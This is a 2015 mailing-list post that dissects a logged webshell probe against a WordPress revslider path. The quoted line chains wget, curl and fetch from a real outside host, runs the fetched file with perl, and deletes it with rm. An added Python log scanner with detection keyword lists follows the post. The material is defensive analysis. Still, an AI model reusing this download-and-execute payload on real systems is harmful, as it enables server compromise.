[Info-vax] Using VMS for a web server

Bill Gunshannon bill at server3.cs.uofs.edu
Tue Jun 9 10:49:43 EDT 2015


In article <ml6qf1$d82$1 at news.albasani.net>,
	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
> 
> 
> It would be nice to have a reproducer and test it out.
> Or at least a pointer to a description.
> 
....
> 
> OK. I have only read quite a lot about PHP and its "problems"
> but never used it or had it installed on any server.
> 
> But it would surprise me *a lot* if there wasn't an available
> fix for a simple URL based exploit...

OK, I wasn't busy (some of these updates are like watching paint dry!)
so here is just one to look at.

First, a log entry (sanitized a bit as I don't really need someone else
trying this):

103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


Now, let's pull out the applicable part:

"GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"

Now we analyze it:

"GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php

There is a request to get a PHP script.

Note immediately after this part is "?cmd="        Hmmmmmm......

And what is the command?

wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*

And if we break it down:

wget%20http://identerprise.co.kr/css/qtalk.txt;

curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;

fetch%20http://identerprise.co.kr/css/b.txt;

perl%20qtalk.txt;

rm%20-rf%20qtalk.txt*


So, the attacker uses a hole in PHP to download a Perl script, using three
common ways of doing it (I don't know if any of these are available on VMS
but I suspect curl or wget might be).  He then runs it.  And when he is done
he cleans up his tracks.

What does it do?  No idea.  The point is to show something that PHP allows
as a "feature" that makes it probably the worst possible web scripting
language.

I have seen this method used to download a telnet daemon written in either
PHP or Perl.  This allows outsiders who do not have an account on a system
to get in for a look around.  Good way to look for security shortcomings.

bill

-- 
Bill Gunshannon          |  de-moc-ra-cy (di mok' ra see) n.  Three wolves
billg999 at cs.scranton.edu |  and a sheep voting on what's for dinner.
University of Scranton   |
Scranton, Pennsylvania   |         #include <std.disclaimer.h>   
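One way to pick entries like the one Bill walks through out of an access log automatically, as an added example that is not code from the original post or from any VMS or PHP project: it parses combined-format lines, percent-decodes the query string by hand so that the ';' separators in the attacker's command survive, and grades each request by whether a command-style parameter name, a downloader, an interpreter and a cleanup step appear together. The parameter names and program lists are assumptions of mine, and the three log lines are constructed with reserved addresses and a reserved hostname rather than the real ones from the post.

```python
"""Flag webshell-style command-injection probes in Apache/NCSA combined-format logs.

Added example, not code from the original post. The log lines below are constructed:
192.0.2.0/24 and example.invalid are reserved documentation values, not real hosts.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query parameter names a dropped webshell typically reads its command from (assumed list).
SUSPECT_PARAMS = {"cmd", "exec", "command", "system", "shell"}
# Programs that pull a remote file, and programs that run one (assumed lists).
DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "sh", "bash", "python", "php"}
# Shell separators that chain several commands into one line.
CHAIN_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")

# Constructed sample log: one probe shaped like the entry quoted in the post, one normal
# page view, and one request whose parameter name alone is suspicious.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/example/dropped.php'
    '?cmd=wget%20http://example.invalid/a.txt;curl%20-O%20http://example.invalid/a.txt;'
    'perl%20a.txt;rm%20-rf%20a.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0"',
    '192.0.2.20 - - [14/Mar/2015:20:37:01 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [14/Mar/2015:20:38:12 -0400] "GET /tools.php?cmd=list HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_query(query):
    """Split a raw query string on '&' and percent-decode names and values.

    Done by hand rather than with parse_qs so that a ';' inside a value (a shell
    separator in the attacker's command) is never treated as a parameter separator.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def split_chain(command):
    """Break a decoded shell command line into the individual commands it chains."""
    return [c for c in CHAIN_RE.split(command) if c]


def analyze(line):
    """Classify one log line; returns the parsed fields plus the indicators found."""
    rec = parse_line(line)
    if rec is None:
        return {"parsed": False, "indicators": [], "commands": []}
    url = urlsplit(rec["target"])
    indicators, commands = [], []
    for name, values in parse_query(url.query).items():
        if name.lower() in SUSPECT_PARAMS:
            indicators.append(f"shell-command parameter '{name}'")
            for value in values:
                commands.extend(split_chain(value))
    programs = [c.split()[0] for c in commands if c.split()]
    downloaders = sorted(set(programs) & DOWNLOADERS)
    if downloaders:
        indicators.append("remote download (" + ", ".join(downloaders) + ")")
    if set(programs) & INTERPRETERS:
        indicators.append("execution of fetched file")
    if "rm" in programs:
        indicators.append("cleanup of dropped file")
    if len(commands) > 1:
        indicators.append(f"{len(commands)} chained commands")
    return {"parsed": True, "ip": rec["ip"], "path": url.path,
            "status": int(rec["status"]), "commands": commands, "indicators": indicators}


def severity(result):
    """'high' for a download-then-run chain, 'medium' for a bare command parameter, else 'none'."""
    inds = result["indicators"]
    if "execution of fetched file" in inds and any(i.startswith("remote download") for i in inds):
        return "high"
    return "medium" if inds else "none"


def scan(lines):
    """Return (ip, path, status, severity) for every line that parses."""
    out = []
    for line in lines:
        r = analyze(line)
        if r["parsed"]:
            out.append((r["ip"], r["path"], r["status"], severity(r)))
    return out


if __name__ == "__main__":
    for ip, path, status, sev in scan(SAMPLE_LOG):
        print(f"{sev:6} {status} {ip:12} {path}")
```

The status field matters for triage: a 404, as in the entry quoted above, means this host did not have the script the probe was aimed at, so nothing ran here; the line is still worth keeping because it names the download host and the plugin path the scanner expects to find, which is what a defender blocks and watches for.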


